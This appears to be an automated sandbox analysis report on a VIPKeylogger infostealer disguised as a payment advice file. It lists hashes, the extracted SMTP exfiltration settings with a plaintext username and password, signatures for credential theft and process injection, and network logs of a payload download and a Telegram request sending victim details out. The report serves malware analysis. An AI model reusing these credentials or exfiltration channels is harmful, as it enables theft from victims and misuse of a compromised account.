Analysis
max time kernel: 143s
max time network: 144s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 16/11/2024, 15:49 UTC
Static task: static1
Behavioral task behavioral1: sample PayeeAdvice_HK54912_R0038704_37504.exe, resource win7-20241023-en
Behavioral task behavioral2: sample PayeeAdvice_HK54912_R0038704_37504.exe, resource win10v2004-20241007-en
Behavioral task behavioral3: sample $PLUGINSDIR/System.dll, resource win7-20240903-en
Behavioral task behavioral4: sample $PLUGINSDIR/System.dll, resource win10v2004-20241007-en
General
Target: PayeeAdvice_HK54912_R0038704_37504.exe
Size: 814KB
MD5: a7071c7cf3999b13607413c36e8d5418
SHA1: a4d955d14cfb368d93bc7083214b01dec4c90f2b
SHA256: 4cdbe754de2114be5f9ccf7e3f3d4f9f7f8fadc279e860bb1773aee0e2de4047
SHA512: 4680f4794735608e5594b72ed7c84e9f1af90119d76d541d3d4f27f188a1546e01d3a556d32319da58021ad886f03d67b0deae43e45b6d706b242287f9fe61ed
SSDEEP: 24576:/vYV0HT73uF4hi1qCCeFc2QCJgGNXk01vDxPVv7c:YOzaK6VcS5xhDxK
Malware Config
Extracted
Protocol: smtp
Host: mail.foodex.com.pk
Port: 587
Username: wajahat@foodex.com.pk
Password: wajahat1975
Extracted
Family: vipkeylogger
Protocol: smtp
Host: mail.foodex.com.pk
Port: 587
Username: wajahat@foodex.com.pk
Password: wajahat1975
Email To: millions1000@proton.me
Signatures
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was found in 2020.
Vipkeylogger family
Loads dropped DLL (1 IoC)
pid 2600  Process PayeeAdvice_HK54912_R0038704_37504.exe
Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk, where infostealers will often target it.
Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
Key opened  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  Process PayeeAdvice_HK54912_R0038704_37504.exe
Key opened  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  Process PayeeAdvice_HK54912_R0038704_37504.exe
Key opened  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  Process PayeeAdvice_HK54912_R0038704_37504.exe
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow 26  ioc checkip.dyndns.org
Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
pid 1948  Process PayeeAdvice_HK54912_R0038704_37504.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
pid 2600  Process PayeeAdvice_HK54912_R0038704_37504.exe
pid 1948  Process PayeeAdvice_HK54912_R0038704_37504.exe
Suspicious use of SetThreadContext (1 IoC)
PID 2600 set thread context of 1948  pid 2600  Process PayeeAdvice_HK54912_R0038704_37504.exe  procid_target 96
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 2 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  Process PayeeAdvice_HK54912_R0038704_37504.exe  (2 occurrences)
Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid 1948  Process PayeeAdvice_HK54912_R0038704_37504.exe  (2 occurrences)
Suspicious behavior: MapViewOfSection (1 IoC)
pid 2600  Process PayeeAdvice_HK54912_R0038704_37504.exe
Suspicious use of AdjustPrivilegeToken (1 IoC)
Token: SeDebugPrivilege  pid 1948  Process PayeeAdvice_HK54912_R0038704_37504.exe
Suspicious use of WriteProcessMemory (5 IoCs)
PID 2600 wrote to memory of 1948  pid 2600  Process PayeeAdvice_HK54912_R0038704_37504.exe  procid_target 96  (5 occurrences)
outlook_office_path (1 IoC)
Key opened  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  Process PayeeAdvice_HK54912_R0038704_37504.exe
outlook_win_path (1 IoC)
Key opened  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  Process PayeeAdvice_HK54912_R0038704_37504.exe
Processes
[1] C:\Users\Admin\AppData\Local\Temp\PayeeAdvice_HK54912_R0038704_37504.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\PayeeAdvice_HK54912_R0038704_37504.exe"
    PID: 2600
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
[2] C:\Users\Admin\AppData\Local\Temp\PayeeAdvice_HK54912_R0038704_37504.exe  (child of [1])
    Command line: "C:\Users\Admin\AppData\Local\Temp\PayeeAdvice_HK54912_R0038704_37504.exe"
    PID: 1948
    - Accesses Microsoft Outlook profiles
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
-
Network
-
Remote address: 8.8.8.8:53  Request: 28.118.140.52.in-addr.arpa IN PTR  Response: (empty)
-
Remote address: 8.8.8.8:53  Request: 140.32.126.40.in-addr.arpa IN PTR  Response: (empty)
-
Remote address: 8.8.8.8:53  Request: 95.221.229.192.in-addr.arpa IN PTR  Response: (empty)
-
Remote address: 8.8.8.8:53  Request: 196.249.167.52.in-addr.arpa IN PTR  Response: (empty)
-
Remote address: 8.8.8.8:53  Request: 97.17.167.52.in-addr.arpa IN PTR  Response: (empty)
-
Remote address: 8.8.8.8:53
Request: api.onedrive.com IN A
Response:
  api.onedrive.com IN CNAME common-afdrk.fe.1drv.com
  common-afdrk.fe.1drv.com IN CNAME odc-commonafdrk-geo.onedrive.akadns.net
  odc-commonafdrk-geo.onedrive.akadns.net IN CNAME odc-commonafdrk-brs.onedrive.akadns.net
  odc-commonafdrk-brs.onedrive.akadns.net IN CNAME common.be.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net
  common.be.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net IN CNAME l-0003.l-msedge.net
  l-0003.l-msedge.net IN A 13.107.42.12
-
GET https://api.onedrive.com/v1.0/shares/s!Ak1b_TF9hoG0fK5urEn6TsYKM_Y/root/content
Process: PayeeAdvice_HK54912_R0038704_37504.exe
Remote address: 13.107.42.12:443
Request:
GET /v1.0/shares/s!Ak1b_TF9hoG0fK5urEn6TsYKM_Y/root/content HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: api.onedrive.com
Cache-Control: no-cache
Response:
HTTP/1.1 302 Found
Via: 1.1 AM3PPF2321BB25C (wls-colorado)
Location: https://fa3hwa.dm.files.1drv.com/y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4b7j6aZi_6ijPwhelKeUnPxDOGjlqm8sCQ6PsJqBTReZUlLMc7dAcR7XlNz2TvpwYv2DEMCQktobmlzTemLYAZHbCHN5XyR1CyXP4MLrlsiLaHWYTUMx7UdGkSNmTxrk-jRRJigmuo_I0CVq8QFAgzw/kuqVmvhlro64.bin
Vary: Accept,Accept-Language,Authorization,Prefer
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-WLSPROXY: AM3PPF2321BB25C
MS-CV: 2QZESTAWNkeyxHNvVx/eWQ.0
X-MSNSERVER: DS1PPFB5E6240F0
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-VroomVersion: v1.0
X-AsmVersion: UNKNOWN; 19.1547.1104.2005
X-AsmVersion-ProxyApp: UNKNOWN; 19.1547.1104.2005
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 179CF393B19E4581BB8916838DD262D1 Ref B: LON04EDGE0720 Ref C: 2024-11-16T15:49:28Z
Date: Sat, 16 Nov 2024 15:49:28 GMT
Content-Length: 0
-
Remote address: 8.8.8.8:53
Request: fa3hwa.dm.files.1drv.com IN A
Response:
  fa3hwa.dm.files.1drv.com IN CNAME dm-files.fe.1drv.com
  dm-files.fe.1drv.com IN CNAME odc-dm-files-geo.onedrive.akadns.net
  odc-dm-files-geo.onedrive.akadns.net IN CNAME odc-dm-files-brs.onedrive.akadns.net
  odc-dm-files-brs.onedrive.akadns.net IN CNAME dm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net
  dm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net IN CNAME l-0003.l-msedge.net
  l-0003.l-msedge.net IN A 13.107.42.12
-
Remote address: 8.8.8.8:53  Request: 12.42.107.13.in-addr.arpa IN PTR  Response: 12.42.107.13.in-addr.arpa IN PTR 1drvms
-
GET https://fa3hwa.dm.files.1drv.com/y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4b7j6aZi_6ijPwhelKeUnPxDOGjlqm8sCQ6PsJqBTReZUlLMc7dAcR7XlNz2TvpwYv2DEMCQktobmlzTemLYAZHbCHN5XyR1CyXP4MLrlsiLaHWYTUMx7UdGkSNmTxrk-jRRJigmuo_I0CVq8QFAgzw/kuqVmvhlro64.bin
Process: PayeeAdvice_HK54912_R0038704_37504.exe
Remote address: 13.107.42.12:443
Request:
GET /y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4b7j6aZi_6ijPwhelKeUnPxDOGjlqm8sCQ6PsJqBTReZUlLMc7dAcR7XlNz2TvpwYv2DEMCQktobmlzTemLYAZHbCHN5XyR1CyXP4MLrlsiLaHWYTUMx7UdGkSNmTxrk-jRRJigmuo_I0CVq8QFAgzw/kuqVmvhlro64.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: fa3hwa.dm.files.1drv.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Length: 277568
Content-Type: application/octet-stream
Content-Location: https://fa3hwa.dm.files.1drv.com/y4m_-tS-_uEp2WLW1w2OoZgzsGzku4HExGuSK8wL1Z32RLgaY3iv2hMYfC9YHYGwFGEq0tfy0dQYpSfCk-TMSdqBUJa4Ey50Bu0VPEzjgm9430LdVRPhHYoVVX-UPBUPOYw_1hYmvg7hXtrIrgh29l7yob8XHPOVRJWGksng5GhlK75aQs6mkqIiDbsmuul9oaMCqa6H0VbKFkF1t6HS8JKUw
Expires: Fri, 14 Feb 2025 15:49:29 GMT
Last-Modified: Thu, 14 Nov 2024 05:13:34 GMT
Accept-Ranges: bytes
ETag: aQjQ4MTg2N0QzMUZENUI0RCExMjQuMg
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-MSNSERVER: DS1PPF422D3B0AC
Strict-Transport-Security: max-age=31536000; includeSubDomains
MS-CV: 8uo6kfdiWUewrP2987GxUw.0
X-SqlDataOrigin: S
CTag: aYzpCNDgxODY3RDMxRkQ1QjREITEyNC4yNTc
X-PreAuthInfo: rv;poba;
Content-Disposition: attachment; filename="kuqVmvhlro64.bin"
X-Content-Type-Options: nosniff
X-StreamOrigin: X
X-AsmVersion: UNKNOWN; 19.1547.1104.2005
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: D2BFB17827DC4C0B85CA311F8F5AF0A3 Ref B: LON04EDGE1214 Ref C: 2024-11-16T15:49:29Z
Date: Sat, 16 Nov 2024 15:49:29 GMT
-
Remote address: 8.8.8.8:53
Request: checkip.dyndns.org IN A
Response:
  checkip.dyndns.org IN CNAME checkip.dyndns.com
  checkip.dyndns.com IN A 132.226.247.73
  checkip.dyndns.com IN A 193.122.6.168
  checkip.dyndns.com IN A 193.122.130.0
  checkip.dyndns.com IN A 158.101.44.242
  checkip.dyndns.com IN A 132.226.8.169
-
Remote address: 132.226.247.73:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 499c9118070dacc7703c9dfad9be5ab5
-
Remote address: 132.226.247.73:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 972005ac083cb2b06e7cd46d4f18b08f
-
Remote address: 132.226.247.73:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 1986e9f1485ae6892d38308dc0df1f98
-
Remote address: 132.226.247.73:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: a0032cf886aed4659a5ce8c24f88099f
-
Remote address: 132.226.247.73:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 2ec5ac7cdcc8caefe69b448c15299a4e
-
Remote address: 132.226.247.73:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b3fb38cb81f50e2f68d8c061d7665193
-
Remote address: 132.226.247.73:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 022acd3f1157b717fd251d26ba538633
-
Remote address: 132.226.247.73:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: d0216ac5e4f0a3ab10e2912140f74b08
-
Remote address: 132.226.247.73:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: dce9514b360f27ca5d3981f70354208a
-
Remote address: 132.226.247.73:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: a682975d49fca824f0c0f0e9407d20e5
-
Remote address: 8.8.8.8:53
Request: reallyfreegeoip.org IN A
Response:
  reallyfreegeoip.org IN A 172.67.177.134
  reallyfreegeoip.org IN A 104.21.67.152
-
Remote address: 172.67.177.134:443
Request:
GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259626
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ShbAyYiy5jY84lKhIJC22yB0zrog6jTkKYFf2BgsG9AAJDDkVoN9irvaMW%2BODzi8OFLh523gH5R3c8gR009%2BMkpAQPjjAPz8NMXcq42WwF3nvtgjK4MQtBnEejBNn9gZ5qkdhuSH"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1adaa6f3dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=49780&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3011&recv_bytes=390&delivery_rate=75593&cwnd=253&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=143&x=0"
-
Remote address: 172.67.177.134:443
Request:
GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259626
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3PN%2FvNAxe9a1pxFSJ%2BCU%2FF7%2B9QCxHZflJZ3mNeEvfjz0AjmPCBbWZ2NN0JX80dRTRHAHGkNNlT7WjZbBGOoUqy7TP50cYA4pT3XnCy%2BcWUtOt4BlgIr6NLoNVnzH%2FkKD3FZoPQFE"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1af9d653dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=56315&sent=6&recv=8&lost=0&retrans=0&sent_bytes=4249&recv_bytes=482&delivery_rate=75593&cwnd=254&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=449&x=0"
-
Remote address: 172.67.177.134:443
Request:
GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259627
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6JYb8wWIlZTy1ETNRgllbBeudaQYSpACbDzNznvKP%2FmXm1kWLWFZZ3pcNAGkocuYOVsH5RzmOq8wzZ23yXUMtnPOriBjF3YUeVlvFtYu61Kp7nCj20BwDX%2BT1%2BLXEgBC8hfQYFhZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1b1785d3dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=60527&sent=7&recv=10&lost=0&retrans=0&sent_bytes=5495&recv_bytes=574&delivery_rate=75593&cwnd=255&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=753&x=0"
-
Remote address: 172.67.177.134:443
Request:
GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259627
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8DPRwQKxlnKHdcnmJXg77ip7sN7pSX%2BDgC%2Bpz5mgWS6qOfnKtq6arsXd1uaxZ7FtpkWjxXTvFPPSDoIVs3Z8sanao4owYj9Lao9F8uPrzz3PzTr3WxYk%2B8uElPNnb7%2BEXwLx5KZH"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1b35c073dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=65270&sent=8&recv=12&lost=0&retrans=0&sent_bytes=6736&recv_bytes=666&delivery_rate=75593&cwnd=256&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=1049&x=0"
-
Remote address: 172.67.177.134:443
Request:
GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259627
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wKDIdYt8RkaGOszsrrIk%2ByoeBvhjiHrB8z49idZWYEnEDRdTJUhLItSdLY9IUtPmc85kMQUwBUdMLFXWC8b5TF3nZUB2gvy0XTzwXBcKSb%2FO4KO0E93yAmG0MO1zinL1ji6yb5up"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1b53f023dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=69556&sent=9&recv=14&lost=0&retrans=0&sent_bytes=7980&recv_bytes=758&delivery_rate=75593&cwnd=257&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=1343&x=0"
-
Remote address: 172.67.177.134:443
Request:
GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259627
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xSRI0mCS4tLdIxd8fniWLqayh%2BCSAUGPo6lcbkBhjv%2Fc%2BR6EO77cBFNB4h1Hdgd5ylPZWE4%2FJ1RW6cf%2BZ31JXMU18HsvcOzkiDiEwXsVF2sz98COsLhfEnXQD6EhWMkplOd%2Fb4Bn"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1b709cc3dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=71765&sent=10&recv=16&lost=0&retrans=0&sent_bytes=9220&recv_bytes=850&delivery_rate=75593&cwnd=257&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=1635&x=0"
-
Remote address: 172.67.177.134:443
Request:
GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259628
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DRh6oABA4R3oh9nzmi51Rel0XEdbSEwhRJn0fIOihjTbUXy%2BgZ16ExupK%2FvKyRZUzMkqRaNRKi%2BSgkN3ssBUD8vVIi1j3QDIFnr9V7SjsHoIKryggQSEJ6EE%2BEnd%2FMRMOhdV1JBv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1b8dd783dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=74285&sent=11&recv=18&lost=0&retrans=0&sent_bytes=10469&recv_bytes=942&delivery_rate=75593&cwnd=257&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=1937&x=0"
-
Remote address: 172.67.177.134:443
Request:
GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259628
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DNksq%2BEQlyGF4kbQF4k94xvN%2FiacoRB8%2BWE5VELmPbYMb2HRWvVhbBGZYE2y28mbghSPbNFi6fh40l3FQWhO3a3BM%2FOrPcaKLMD5s4REigrhfXHNTEOORUVB%2FWAxf%2FKeMKP66B69"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1bab8683dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=77787&sent=12&recv=20&lost=0&retrans=0&sent_bytes=11717&recv_bytes=1034&delivery_rate=75593&cwnd=257&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=2245&x=0"
-
Remote address: 172.67.177.134:443
Request:
GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259628
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0hEZxsrRoqaJwEjavlY1C0HnnnqgMKZuGY%2BUJI7JzQgmsQSxmcLemmrPjBdzRCwHLH1vChfLXaC0qAAaxhHVKIS9MycNZXlBivRk3%2FeYZtut%2FUe1Y%2FEHImNW%2FZsahUqqaUUP5jpp"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1bcabd93dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=79428&sent=13&recv=22&lost=0&retrans=0&sent_bytes=12968&recv_bytes=1126&delivery_rate=75593&cwnd=257&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=2565&x=0"
-
Remote address: 8.8.8.8:53  Request: 73.247.226.132.in-addr.arpa IN PTR  Response: (empty)
-
Remote address: 8.8.8.8:53  Request: 134.177.67.172.in-addr.arpa IN PTR  Response: (empty)
-
Remote address: 8.8.8.8:53  Request: api.telegram.org IN A  Response: api.telegram.org IN A 149.154.167.220
-
GET https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:KBKWGEBK%0D%0ADate%20and%20Time:%2011/16/2024%20/%203:49:33%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20KBKWGEBK%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
Process: PayeeAdvice_HK54912_R0038704_37504.exe
Remote address: 149.154.167.220:443
Request:
GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:KBKWGEBK%0D%0ADate%20and%20Time:%2011/16/2024%20/%203:49:33%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20KBKWGEBK%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
Response:
HTTP/1.1 404 Not Found
Date: Sat, 16 Nov 2024 15:49:35 GMT
Content-Type: application/json
Content-Length: 55
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
-
Remote address: 8.8.8.8:53  Request: 220.167.154.149.in-addr.arpa IN PTR  Response: (empty)
-
Remote address: 8.8.8.8:53  Request: 197.87.175.4.in-addr.arpa IN PTR  Response: (empty)
-
Remote address: 8.8.8.8:53  Request: 171.39.242.20.in-addr.arpa IN PTR  Response: (empty)
-
Remote address: 8.8.8.8:53
